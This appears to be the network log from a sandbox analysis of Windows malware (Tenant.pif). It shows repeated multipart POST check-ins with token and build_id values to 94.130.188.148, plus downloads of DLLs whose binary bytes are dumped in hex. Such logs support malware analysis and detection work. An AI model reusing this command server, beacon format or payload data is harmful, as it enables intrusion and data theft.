                                                                                      2024-08-29 18:49:29 UTC6797OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------CBFCBKKFBAEHJKEBKFCBCont
                                                                                      2024-08-29 18:49:30 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:30 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:49:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.55994494.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:30 UTC222OUTGET /sqlr.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:31 UTC263INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:31 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 2459136
                                                                                      Connection: close
                                                                                      Last-Modified: Thursday, 29-Aug-2024 18:49:31 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-08-29 18:49:31 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                      2024-08-29 18:49:31 UTC16384INData Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                      Data Ascii: %:X~e!*FW|>|L1146
                                                                                      2024-08-29 18:49:31 UTC16384INData Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56
                                                                                      Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                      2024-08-29 18:49:31 UTC16384INData Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89
                                                                                      Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                      2024-08-29 18:49:31 UTC16384INData Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f
                                                                                      Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                      2024-08-29 18:49:31 UTC16384INData Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                      Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                      2024-08-29 18:49:31 UTC16384INData Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                      Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                      2024-08-29 18:49:31 UTC16384INData Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3
                                                                                      Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                      2024-08-29 18:49:31 UTC16384INData Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3
                                                                                      Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                      2024-08-29 18:49:31 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                      Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.55994594.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:34 UTC306OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 829
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:34 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------KKFCFBKFCFBFIDGCGDHJCont
                                                                                      2024-08-29 18:49:35 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:35 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:49:35 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.55994694.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:35 UTC306OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----CBKJJJDHDGDAAKECAKJD
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 437
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:35 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------CBKJJJDHDGDAAKECAKJDContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------CBKJJJDHDGDAAKECAKJDContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------CBKJJJDHDGDAAKECAKJDCont
                                                                                      2024-08-29 18:49:36 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:36 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:49:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.55994794.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:36 UTC306OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 437
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:36 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------IDBGHDGHCGHCAAKFIIECContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------IDBGHDGHCGHCAAKFIIECCont
                                                                                      2024-08-29 18:49:37 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:37 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:49:37 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.55994894.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:37 UTC225OUTGET /freebl3.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:38 UTC262INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:38 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 685392
                                                                                      Connection: close
                                                                                      Last-Modified: Thursday, 29-Aug-2024 18:49:38 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-08-29 18:49:38 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                      2024-08-29 18:49:38 UTC16384INData Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f
                                                                                      Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                      2024-08-29 18:49:38 UTC16384INData Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8
